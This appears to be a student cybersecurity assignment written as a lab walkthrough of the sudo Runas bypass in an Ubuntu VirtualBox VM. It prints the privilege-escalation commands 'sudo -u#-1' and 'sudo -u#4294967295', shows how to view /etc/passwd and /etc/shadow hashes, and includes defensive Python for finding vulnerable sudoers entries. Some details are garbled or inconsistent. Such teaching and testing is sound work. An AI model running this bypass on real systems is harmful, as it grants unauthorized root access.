malangalothbrok/sudo-linux-bypass

OHTS ASSIGNMENT

A.G.Malanga Mishad Vishwajith Thilakarathna.

IT16035836

BSc (Hons) in Information Technology Specializing in Cyber Security

Department of Information Technology

Sri Lanka Institute of Information Technology

Sri Lanka

MAY 2020

Table of Contents

WHAT IS SUDO?

SUDOERS FILE

How to set up the attack

Vulnerability details

Brief description of the vulnerability

DEMONSTRATION OF EXPLOITING THE VULNERABILITY

REFERENCES

Figure 1: the command to check the sudo version

Figure 2: checking the passwd file: command

Figure 3: shows the password file

Figure 4: hash file

Figure 5: hash values

Figure 6: making a new user

Figure 7: user will get a password

Figure 8: user ID checking

Figure 9: accessing the sudoers file

Figure 10: user privileges

Figure 11: id command user privilege denied

Figure 12: sudo command user privilege denied

Figure 13: root user ID

Figure 14: exploiting the vulnerability

WHAT IS SUDO?

Sudo, short for Super User Do, is a program for UNIX and Linux systems that gives a user the permissions needed to run commands and scripts as root, and it logs every command together with its arguments [1]. A sudo system administrator can:

  • Grant users permission to run commands as root
  • Control which commands a user may run on each host
  • See the commands users have run, via the sudo log
  • Control how long a user may keep entering commands after authenticating, through the use of timestamp files

SUDOERS FILE

This is the file located at /etc/sudoers that controls which users may use the sudo command and which elevated privileges each of them receives. The safest way to edit it is with the visudo command, which opens the file in the vi editor, places a lock on it so that no other user can edit it at the same time, and parses it for syntax errors when the edit is saved [2].

How to set up the attack

  1. Download Ubuntu 16.4 from a trusted website; the most commonly used one is osboxes.org [3]
  2. Install VirtualBox from its website [4]
  3. Open VirtualBox and add a new machine
  4. Give your virtual machine a name
  5. Set the file path to the downloaded image
  6. Set the type to Linux
  7. Set the version to match your downloaded file, either 64-bit or 32-bit
  8. Set the RAM size and create the machine

Vulnerability details

Brief description of the vulnerability

Even though the sudoers file explicitly prevents a user from running commands as root, this security bypass vulnerability lets that user execute commands as root on a Linux system anyway.

A user whose sudoers entry has ALL in the Runas specification can run the permitted commands as any user on the system.

The vulnerability lets such a user specify the target user ID as -1, or its unsigned equivalent 4294967295, and sudo then runs the command or tool as root:

  sudo -u#-1 /usr/bin/id

or, with the unsigned equivalent of -1:

  sudo -u#4294967295 /usr/bin/id
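As an added illustration (not code from the assignment or from sudo itself), the following Python models why -1 and 4294967295 collapse to the same user ID, how a setresuid()-style call then leaves the setuid-root process at uid 0, and the check a fixed parser applies; the sudoers pattern `(ALL, !root)` and the sample sudoers text are assumptions constructed for this example.

```python
import re

UID_MAX = 0xFFFFFFFF        # uid_t is a 32-bit unsigned integer on Linux
UID_UNCHANGED = UID_MAX     # (uid_t)-1: setresuid() reads it as "leave this id unchanged"


def parse_runas_uid(spec, strict=True):
    """Parse the argument of `sudo -u#<id>` as a numeric user id.

    The decimal text is converted like atoi() and then truncated to uid_t,
    so "-1" and "4294967295" both become 0xFFFFFFFF. With strict=True that
    value is rejected, which is the behaviour a fixed parser must have.
    """
    if not spec.startswith("#"):
        raise ValueError("numeric runas specs start with '#'")
    uid = int(spec[1:], 10) & UID_MAX
    if strict and uid == UID_UNCHANGED:
        raise ValueError("user id -1 / 4294967295 is not a valid target user")
    return uid


def effective_uid_after_setresuid(current_uid, requested_uid):
    """Model setresuid(): a requested id of (uid_t)-1 keeps the current id."""
    return current_uid if requested_uid == UID_UNCHANGED else requested_uid


def runas_is_root_bypass(spec):
    """True when a non-root target id still leaves a setuid-root sudo at uid 0."""
    uid = parse_runas_uid(spec, strict=False)
    return uid != 0 and effective_uid_after_setresuid(0, uid) == 0


# Runas list "ALL with root excluded" (assumed sudoers syntax for the restriction)
RUNAS_ALL_NOT_ROOT = re.compile(r"\(\s*ALL\s*,\s*!root\s*\)")


def vulnerable_sudoers_lines(sudoers_text):
    """Return the sudoers lines that rely on '!root' alone to keep a user off root."""
    return [line.strip() for line in sudoers_text.splitlines()
            if RUNAS_ALL_NOT_ROOT.search(line) and not line.lstrip().startswith("#")]


# Constructed sample sudoers content for this example (not taken from the assignment)
SAMPLE_SUDOERS = """\
root ALL=(ALL:ALL) ALL
ohtsassignment ALL=(ALL, !root) /usr/bin/id
%admin ALL=(ALL) ALL
"""
```

Running `vulnerable_sudoers_lines` over a real /etc/sudoers (and /etc/sudoers.d/*) is a quick way to find entries that need either a sudo upgrade or a Runas list that names the allowed users explicitly instead of excluding root.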

DEMONSTRATION OF EXPLOITING THE VULNERABILITY

Figure 1: the command to check the sudo version

  • This shows the command used to check the sudo version.
  • It shows that the affected sudo versions are version 1.8.16 and earlier.

Figure 2: checking the passwd file: command

  • Linux systems keep user accounts in a separate file. The command to view it is cat /etc/passwd. In this file the password field of each account holds only the letter x rather than the password itself.

Figure 3: shows the password file

Figure 4: hash file

  • The hashes of these passwords are stored in the shadow file, /etc/shadow.

Figure 5: hash values

  • This shows the hash of the password belonging to the user called "osboxes".

Figure 6: making a new user

  • To make the attack demonstration easier, I will create a new user.
  • s /bin/bash ohtsassignment

Figure 7: user will get a password

Figure 8: user ID checking

  • The password file is checked again, and the new user's ID is one higher than the previous one. Linux assigns user IDs from two ranges: system users get IDs greater than 0 and less than 1000, and regular user accounts get IDs greater than 1000. The user ID of root is always 0.

Figure 9: accessing the sudoers file

  • We now open the sudoers file. The command is as follows:

Figure 10: user privileges

sudo visudo

  • Inside the sudoers file you can find the user privileges: the commands each user can and cannot run.

Figure 11: id command user privilege denied

  • The privilege for the new user, ohtsassignment, to run the id command as root is removed.

Figure 12: sudo command user privilege denied

  • This shows that when the ohtsassignment user runs the command through sudo, it is denied.

Figure 13: root user ID

  • The user ID of the user named ohtsassignment is 10001, and the user ID of root is zero. Even when root is specified as the target user and the id command is run, it is denied.

Figure 14: exploiting the vulnerability

  • I will now exploit the vulnerability by using user ID -1, which bypasses the restriction and gives access to all privileges. Accordingly, the commands denied to user ohtsassignment can be run by specifying the user ID as -1.

REFERENCES

  1. https://searchsecurity.techtarget.com/definition/sudo-superuser-do
  2. https://linuxacademy.com/blog/linux/linux-commands-for-beginners-sudo/
  3. https://www.osboxes.org/ubuntu/
  4. https://www.virtualbox.org/wiki/Downloads
